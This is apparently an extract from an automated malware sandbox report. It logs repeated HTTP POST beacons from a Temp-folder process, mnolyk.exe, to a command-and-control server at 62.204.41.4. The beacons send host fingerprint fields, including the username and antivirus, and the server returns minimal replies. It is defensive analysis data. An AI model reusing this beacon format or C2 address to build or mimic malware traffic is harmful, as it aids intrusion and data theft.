                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:26.163223028 CET | 636 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    437 | 192.168.2.3 | 50140 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:26.342715025 CET | 637 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:26.406277895 CET | 637 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    438 | 192.168.2.3 | 50141 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:26.577111006 CET | 638 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:26.640788078 CET | 638 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    439 | 192.168.2.3 | 50142 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:26.815454960 CET | 639 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:26.880913019 CET | 639 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    44 | 192.168.2.3 | 49746 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:27.686671972 CET | 245 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:27.752453089 CET | 245 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    440 | 192.168.2.3 | 50143 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:27.062953949 CET | 640 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:27.128356934 CET | 640 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    441 | 192.168.2.3 | 50144 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:27.296113014 CET | 641 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:27.361238003 CET | 641 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    442 | 192.168.2.3 | 50145 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:27.528968096 CET | 642 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:27.592056990 CET | 642 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    443 | 192.168.2.3 | 50146 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:27.767390013 CET | 643 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:27.834901094 CET | 643 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    444 | 192.168.2.3 | 50147 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:28.016338110 CET | 644 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:28.082880974 CET | 644 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    445 | 192.168.2.3 | 50148 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:28.265922070 CET | 645 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:28.330866098 CET | 645 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    446 | 192.168.2.3 | 50149 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:28.513257980 CET | 646 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:28.578936100 CET | 646 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    447 | 192.168.2.3 | 50150 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:28.749109983 CET | 647 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:28.811218977 CET | 647 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    448 | 192.168.2.3 | 50151 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:28.985342026 CET | 648 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:29.049519062 CET | 648 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    449 | 192.168.2.3 | 50152 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:29.219203949 CET | 649 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:29.281686068 CET | 649 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    45 | 192.168.2.3 | 49747 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:27.935502052 CET | 246 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:28.000261068 CET | 246 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    450 | 192.168.2.3 | 50153 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:29.450735092 CET | 650 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:29.513860941 CET | 650 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    451 | 192.168.2.3 | 50154 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:29.685349941 CET | 651 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:29.751245975 CET | 651 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    452 | 192.168.2.3 | 50155 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:29.921926022 CET | 652 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:29.986253977 CET | 652 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    453 | 192.168.2.3 | 50156 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:30.159311056 CET | 653 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
